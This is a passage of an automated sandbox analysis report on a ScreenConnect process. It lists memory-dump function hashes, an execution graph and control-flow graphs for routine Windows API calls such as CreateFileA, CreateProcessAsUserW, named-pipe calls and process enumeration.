                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4d414f8bbadc0ae2399cc02ac5d48bd5dffeee3f1fb5cb953e7ffa49487ac14
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08E08C71854201AFC740AFA4E944386BBE4AB54210F448E6DE889C3200E234AD85CB42
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 52c7e7e8846946da097fc470137889e21fbf8cd4fe482a55332253c3a3c42337
                                                                                                                                                                                                                  • Instruction ID: 22cd88d9a14214d4ffe439142d5e7947740d78396d2473f8c23a7937a01061b8
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52c7e7e8846946da097fc470137889e21fbf8cd4fe482a55332253c3a3c42337
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99E0C2704487409FC751CF20E844249BFF0AB42711F0A449EE488D7281E370AC45CF42
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 615fadabeb864b70127890ac5c46f0143d91eb83011b9ea2a8024be3ca2d7c1d
                                                                                                                                                                                                                  • Instruction ID: 4f504b3ee90ef4873884c8dddcbbef41c6a4ec013d111c7de9c5b552c9d36633
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 615fadabeb864b70127890ac5c46f0143d91eb83011b9ea2a8024be3ca2d7c1d
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1D01730A01208EF8B40DFB8E90155DBBB9EB84201B5046ACD808D3204EA316E049B81
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 56a8a8b06344ea4050a139a8cf1f6581d1a75282c91c9d4e063f37803506a902
                                                                                                                                                                                                                  • Instruction ID: 290985e2e6035149e85be137aff7a6992d4006e42eaa2f39196003aea5648965
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56a8a8b06344ea4050a139a8cf1f6581d1a75282c91c9d4e063f37803506a902
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8D05EB0A0620CEFCB40DFB8E94565DFBB9EB48310B1091A9E80CD7300EA716F049B80

                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                  Execution Coverage:9.7%
                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                  Signature Coverage:6.4%
                                                                                                                                                                                                                  Total number of Nodes:78
                                                                                                                                                                                                                  Total number of Limit Nodes:7
                                                                                                                                                                                                                  execution_graph 37576 1ce0ecf 37577 1ce0e94 37576->37577 37578 1ce0e5b 37576->37578 37577->37576 37577->37578 37582 1ce36a0 37577->37582 37586 1ce36b0 37577->37586 37579 1ce133b 37583 1ce36a3 37582->37583 37584 1ce36cc 37582->37584 37583->37584 37590 1ce4c62 37583->37590 37584->37579 37587 1ce36c6 37586->37587 37589 1ce4c62 RtlGetVersion 37587->37589 37588 1ce36cc 37588->37579 37589->37588 37591 1ce4c90 37590->37591 37592 1ce4cc6 37591->37592 37593 1ce4d1d RtlGetVersion 37591->37593 37592->37584 37594 1ce4dda 37593->37594 37594->37584 37595 5952380 37596 595239e 37595->37596 37598 59523b7 37596->37598 37601 59524d0 37596->37601 37599 59524d0 CreateFileA 37599->37598 37602 59524ed 37601->37602 37606 595d6f0 37602->37606 37610 595d6e0 37602->37610 37607 595d703 37606->37607 37614 595bbc8 37607->37614 37611 595d6f0 37610->37611 37612 595bbc8 CreateFileA 37611->37612 37613 59523e0 37612->37613 37613->37599 37615 595d740 CreateFileA 37614->37615 37617 595d875 37615->37617 37629 5950360 37630 59503b3 CreateProcessAsUserW 37629->37630 37632 5950444 37630->37632 37633 5d230e8 37634 5d2311c 37633->37634 37635 5d2310c 37633->37635 37641 5d23257 37634->37641 37648 5d23268 37634->37648 37636 5d23115 37635->37636 37637 5d23257 4 API calls 37635->37637 37638 5d23268 4 API calls 37635->37638 37637->37635 37638->37635 37642 5d23268 37641->37642 37643 5d2328d 37642->37643 37655 5d233d7 37642->37655 37662 5d233e8 37642->37662 37644 5d23296 37643->37644 37669 5d22710 37643->37669 37644->37635 37649 5d2328d 37648->37649 37651 5d2329d 37648->37651 37650 5d23296 37649->37650 37652 5d22710 ProcessIdToSessionId 37649->37652 37650->37635 37653 5d233d7 2 API calls 37651->37653 37654 5d233e8 2 API calls 37651->37654 37652->37649 37653->37649 37654->37649 37658 5d233e8 37655->37658 37656 5d23408 37656->37643 37657 5d2357a K32EnumProcesses 37659 5d235b2 37657->37659 37661 5d233ff 37658->37661 37672 5d2271c 37658->37672 37659->37643 37661->37656 37661->37657 37663 5d23412 37662->37663 37665 5d233ff 37662->37665 37663->37665 37668 5d2271c K32EnumProcesses 37663->37668 37664 5d23408 37664->37643 37665->37664 37666 5d2357a K32EnumProcesses 37665->37666 37667 5d235b2 37666->37667 37667->37643 37668->37663 37670 5d23620 ProcessIdToSessionId 37669->37670 37671 5d23693 37670->37671 37671->37643 37673 5d23528 K32EnumProcesses 37672->37673 37675 5d235b2 37673->37675 37675->37658 37618 5950988 37621 5950774 37618->37621 37622 59509c0 ConnectNamedPipe 37621->37622 37624 5950a50 37622->37624 37625 5952548 37626 5952590 WaitNamedPipeW 37625->37626 37627 595258a 37625->37627 37628 59525c4 37626->37628 37627->37626

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 0 1ce4c62-1ce4cb3 5 1ce4cb5-1ce4cc4 call 1ce4848 0->5 6 1ce4d02-1ce4d08 0->6 9 1ce4d09-1ce4dd8 RtlGetVersion 5->9 10 1ce4cc6-1ce4ccb 5->10 15 1ce4dda-1ce4de0 9->15 16 1ce4de1-1ce4e24 9->16 22 1ce4cce call 1ce52e8 10->22 23 1ce4cce call 1ce52f8 10->23 12 1ce4cd4 12->6 15->16 20 1ce4e2b-1ce4e32 16->20 21 1ce4e26 16->21 21->20 22->12 23->12
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • RtlGetVersion.NTDLL(0000009C), ref: 01CE4DBE
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2961462272.0000000001CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1ce0000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Version
                                                                                                                                                                                                                  • String ID: $;#$$;#$`Qkq$`Qkq
                                                                                                                                                                                                                  • API String ID: 1889659487-2813954190
                                                                                                                                                                                                                  • Opcode ID: a361a001a8bc04401c3bdae0f9873229a214ea1a0b6b7c4eb9a1078760f1ba71
                                                                                                                                                                                                                  • Instruction ID: bceea6c1095f253f0f64edaa25fdd0c453aa4ffcd92c27b1d540ac81e6e191e4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a361a001a8bc04401c3bdae0f9873229a214ea1a0b6b7c4eb9a1078760f1ba71
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B41BE71A00319DFDB649F69C809BAEBBB5FB44300F1085E9D509E7280DB759E48CF92

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 113 5950360-59503b1 114 59503b3-59503b9 113->114 115 59503bc-59503c0 113->115 114->115 116 59503c2-59503c5 115->116 117 59503c8-59503dd 115->117 116->117 118 59503df-59503e8 117->118 119 59503eb-5950442 CreateProcessAsUserW 117->119 118->119 120 5950444-595044a 119->120 121 595044b-5950473 119->121 120->121
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 0595042F
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2977094703.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5950000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateProcessUser
                                                                                                                                                                                                                  • String ID: $;#
                                                                                                                                                                                                                  • API String ID: 2217836671-1209804496
                                                                                                                                                                                                                  • Opcode ID: 8127383408e35cdfe1671a43f94ddeeeb8deed0196c67c10b0da42849965e52d
                                                                                                                                                                                                                  • Instruction ID: b23657a2e7a47b6056afc9e09dc1d07265f1ebf8c0472b5dac4a7d8abc0e4358
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8127383408e35cdfe1671a43f94ddeeeb8deed0196c67c10b0da42849965e52d
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10410276900209DFCB11CFA9C884ADEBBF5FF48320F14852AE918A7250D775A965CF90

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 46 595d734-595d79c 48 595d7f0-595d873 CreateFileA 46->48 49 595d79e-595d7c3 46->49 58 595d875-595d87b 48->58 59 595d87c-595d8ba 48->59 49->48 52 595d7c5-595d7c7 49->52 53 595d7c9-595d7d3 52->53 54 595d7ea-595d7ed 52->54 56 595d7d5 53->56 57 595d7d7-595d7e6 53->57 54->48 56->57 57->57 60 595d7e8 57->60 58->59 64 595d8bc-595d8c0 59->64 65 595d8ca 59->65 60->54 64->65 66 595d8c2 64->66 67 595d8cb 65->67 66->65 67->67
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0595D85D
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2977094703.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5950000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                  • String ID: $;#$$;#$4Lkq
                                                                                                                                                                                                                  • API String ID: 823142352-364487146
                                                                                                                                                                                                                  • Opcode ID: 1e7d17b840fd86fe2d47ce26878b1326514defd4103e5381bef2b955bc7e51c3
                                                                                                                                                                                                                  • Instruction ID: 83ded59de09bff89363e28d4a68d2eec581197bee6517f9f8aa9bc75ca94287d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e7d17b840fd86fe2d47ce26878b1326514defd4103e5381bef2b955bc7e51c3
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 535186B0D003499FDB10CFA9C884B9EBBF2FB48310F248169E808AB351D7B99954CF81

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 24 595bbc8-595d79c 26 595d7f0-595d873 CreateFileA 24->26 27 595d79e-595d7c3 24->27 36 595d875-595d87b 26->36 37 595d87c-595d8ba 26->37 27->26 30 595d7c5-595d7c7 27->30 31 595d7c9-595d7d3 30->31 32 595d7ea-595d7ed 30->32 34 595d7d5 31->34 35 595d7d7-595d7e6 31->35 32->26 34->35 35->35 38 595d7e8 35->38 36->37 42 595d8bc-595d8c0 37->42 43 595d8ca 37->43 38->32 42->43 44 595d8c2 42->44 45 595d8cb 43->45 44->43 45->45
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0595D85D
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2977094703.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5950000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                  • String ID: $;#$$;#$4Lkq
                                                                                                                                                                                                                  • API String ID: 823142352-364487146
                                                                                                                                                                                                                  • Opcode ID: d4bc550a901dd0c14f7a40490458bcbeaea3f58dd8245f748b43fc423cc6f050
                                                                                                                                                                                                                  • Instruction ID: af345986fb48b1242e4636089c338455d51ac06409911434cf14d9de25fb5b2c
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4bc550a901dd0c14f7a40490458bcbeaea3f58dd8245f748b43fc423cc6f050
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B5166B0D003599FDB10CFA9C884B9EBBF2FB48314F248169E809AB355D7B99954CF81

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 68 5d233e8-5d233fd 69 5d23412-5d23419 68->69 70 5d233ff-5d23402 68->70 71 5d2341e-5d23462 call 5d2271c 69->71 72 5d23408-5d23411 70->72 73 5d234cc-5d234e0 70->73 92 5d23467-5d2346c 71->92 74 5d234e2 73->74 75 5d234a6-5d234af 73->75 79 5d234ee-5d234f7 74->79 77 5d234b1-5d234cb 75->77 78 5d2350c-5d2356e 75->78 83 5d23570-5d23578 78->83 84 5d2357a-5d235b0 K32EnumProcesses 78->84 83->84 86 5d235b2-5d235b8 84->86 87 5d235b9-5d235e1 84->87 86->87 93 5d23472-5d23475 92->93 94 5d234f8-5d23505 92->94 95 5d23477-5d234a4 93->95 96 5d234e4-5d234e9 93->96 94->78 95->75 95->79 96->71
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2978513912.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5d20000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: $;#
                                                                                                                                                                                                                  • API String ID: 0-1209804496
                                                                                                                                                                                                                  • Opcode ID: edfec01c9c0de93f22939ab4a6b4ecb728157eff22aa3a3b598b279d453ce672
                                                                                                                                                                                                                  • Instruction ID: 511bc383a468d3197c8a6b247a39de69ef86e47a04d90920782d74f6d868b784
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: edfec01c9c0de93f22939ab4a6b4ecb728157eff22aa3a3b598b279d453ce672
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F519071A006158FCB24CFA9D8806AEFBF1FF88314F14896ED45AD7650D734E945CBA1

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 101 5950358-59503b1 103 59503b3-59503b9 101->103 104 59503bc-59503c0 101->104 103->104 105 59503c2-59503c5 104->105 106 59503c8-59503dd 104->106 105->106 107 59503df-59503e8 106->107 108 59503eb-5950442 CreateProcessAsUserW 106->108 107->108 109 5950444-595044a 108->109 110 595044b-5950473 108->110 109->110
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 0595042F
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2977094703.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5950000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateProcessUser
                                                                                                                                                                                                                  • String ID: $;#
                                                                                                                                                                                                                  • API String ID: 2217836671-1209804496
                                                                                                                                                                                                                  • Opcode ID: b7c58879ee0c8b2f725a1fef8d4ba57ca03515bfe5976d44e567f387db84a74f
                                                                                                                                                                                                                  • Instruction ID: 85b47363bc376420501afdb444abb4507769bbc93997aac6270374cdd8ca0eb4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7c58879ee0c8b2f725a1fef8d4ba57ca03515bfe5976d44e567f387db84a74f
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA411272900209DFCF11CFA9C884ADEBBF5FF48320F14852AE918A7250D775A965CF90

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 124 5950774-5950a4e ConnectNamedPipe 127 5950a57-5950a99 124->127 128 5950a50-5950a56 124->128 132 5950aa3 127->132 133 5950a9b 127->133 128->127 134 5950aa4 132->134 133->132 134->134
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • ConnectNamedPipe.KERNEL32(00000000,00000000), ref: 05950A38
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2977094703.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5950000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ConnectNamedPipe
                                                                                                                                                                                                                  • String ID: $;#
                                                                                                                                                                                                                  • API String ID: 2191148154-1209804496
                                                                                                                                                                                                                  • Opcode ID: d204f61f99a7678dfd37bb2245f30b9327971144628fb418e3d8e32f7c7e1268
                                                                                                                                                                                                                  • Instruction ID: bef196a6504595d82148475603f7de882b106bce49e35b1eb381b272818f4355
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d204f61f99a7678dfd37bb2245f30b9327971144628fb418e3d8e32f7c7e1268
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB2123B1D142589FCB24CF99C588B9EBBF5BF48310F148069E809BB350CB74A845CFA0

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 135 59509b5-5950a4e ConnectNamedPipe 138 5950a57-5950a99 135->138 139 5950a50-5950a56 135->139 143 5950aa3 138->143 144 5950a9b 138->144 139->138 145 5950aa4 143->145 144->143 145->145
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • ConnectNamedPipe.KERNEL32(00000000,00000000), ref: 05950A38
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2977094703.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5950000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ConnectNamedPipe
                                                                                                                                                                                                                  • String ID: $;#
                                                                                                                                                                                                                  • API String ID: 2191148154-1209804496
                                                                                                                                                                                                                  • Opcode ID: 13bbc62fe4818dfe9e84891eec2dec1a91275a63db6ca2ca0adf37ed0c396e32
                                                                                                                                                                                                                  • Instruction ID: b3fcf5ae161641884d340ef9feb45f97d2c889c419633e280dfbd0e7bf5fab2e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13bbc62fe4818dfe9e84891eec2dec1a91275a63db6ca2ca0adf37ed0c396e32
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 832120B1D142589FCB24CFAAC598B9EBBF5BF48310F148469E849AB350CB749845CFA0

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 146 5d2271c-5d2356e 148 5d23570-5d23578 146->148 149 5d2357a-5d235b0 K32EnumProcesses 146->149 148->149 150 5d235b2-5d235b8 149->150 151 5d235b9-5d235e1 149->151 150->151
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 05D2359D
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2978513912.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5d20000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: EnumProcesses
                                                                                                                                                                                                                  • String ID: $;#
                                                                                                                                                                                                                  • API String ID: 84517404-1209804496
                                                                                                                                                                                                                  • Opcode ID: b461e53957b4a5c1259b0eb23d0e2000d824ad2ff0044a6c9e3e942b1f772eac
                                                                                                                                                                                                                  • Instruction ID: 78db8fb3919b24c783755f6104d0f9bfaa74cf7000caaa91846486c872312855
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b461e53957b4a5c1259b0eb23d0e2000d824ad2ff0044a6c9e3e942b1f772eac
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F82125B59042199FDB10CF9AC885BDEFBF4FB48314F10842EE519A7340C338A945CBA5

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 154 5952541-5952588 156 5952590-59525c2 WaitNamedPipeW 154->156 157 595258a-595258d 154->157 158 59525c4-59525ca 156->158 159 59525cb-59525f3 156->159 157->156 158->159
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • WaitNamedPipeW.KERNEL32(00000000), ref: 059525AF
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2977094703.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5950000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: NamedPipeWait
                                                                                                                                                                                                                  • String ID: $;#
                                                                                                                                                                                                                  • API String ID: 3146367894-1209804496
                                                                                                                                                                                                                  • Opcode ID: dda733e9e858c68cc5b7486e2eb937579a9881a4ec502c6b53ff12f62faebc1d
                                                                                                                                                                                                                  • Instruction ID: f1e3b83e1b3a3ffee7ae3b7f72907adab1e4a29873f00ec5a1e664d325c9c1a4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dda733e9e858c68cc5b7486e2eb937579a9881a4ec502c6b53ff12f62faebc1d
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 142124B68003498FCB10CF9AC844BDEBBF5FB48324F14842DD859A7240C779A545CFA1

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 162 5952548-5952588 163 5952590-59525c2 WaitNamedPipeW 162->163 164 595258a-595258d 162->164 165 59525c4-59525ca 163->165 166 59525cb-59525f3 163->166 164->163 165->166
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • WaitNamedPipeW.KERNEL32(00000000), ref: 059525AF
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2977094703.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5950000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: NamedPipeWait
                                                                                                                                                                                                                  • String ID: $;#
                                                                                                                                                                                                                  • API String ID: 3146367894-1209804496
                                                                                                                                                                                                                  • Opcode ID: cfc270efae657595c97d8734c0246cc0fa8b2cbcd739d703d2f2274d36ea8c0e
                                                                                                                                                                                                                  • Instruction ID: ea12f84a789ac98de6df2dce6b961a12361dbe34386acf6c48652fc493a5fa84
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfc270efae657595c97d8734c0246cc0fa8b2cbcd739d703d2f2274d36ea8c0e
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5921F2B68002498FCB24CF9AC444BEEBBF5FB48324F14846ED859A7240D779A545CFA1

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 169 5d22710-5d23691 ProcessIdToSessionId 171 5d23693-5d23699 169->171 172 5d2369a-5d236c2 169->172 171->172
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05D2367E
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2978513912.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5d20000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ProcessSession
                                                                                                                                                                                                                  • String ID: $;#
                                                                                                                                                                                                                  • API String ID: 3779259828-1209804496
                                                                                                                                                                                                                  • Opcode ID: 330c461167a770f3c2f76c8f0fdb34721af6423dd945069d57d90ccb03d95867
                                                                                                                                                                                                                  • Instruction ID: 79aee57cd370ad0bd7801d3ffd6c62d96813b8efd046d3c0bc9f6eb3a5ea445a
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 330c461167a770f3c2f76c8f0fdb34721af6423dd945069d57d90ccb03d95867
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C1103B58002598FCB20DF9AC4447DEFBF4FB48324F11846AD459A7350D378A944CFA5

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 175 5d23619-5d2361a 176 5d23620-5d23691 ProcessIdToSessionId 175->176 177 5d23693-5d23699 176->177 178 5d2369a-5d236c2 176->178 177->178
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05D2367E
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2978513912.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5d20000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ProcessSession
                                                                                                                                                                                                                  • String ID: $;#
                                                                                                                                                                                                                  • API String ID: 3779259828-1209804496
                                                                                                                                                                                                                  • Opcode ID: 4671e3c496b45838532737986a6c60d6dd6fcef123e14b2670efdbc128051f15
                                                                                                                                                                                                                  • Instruction ID: 0e83308b6f5b896345ae78c134b9a5a8ec8c79c5c29b5893305fcec9f392685f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4671e3c496b45838532737986a6c60d6dd6fcef123e14b2670efdbc128051f15
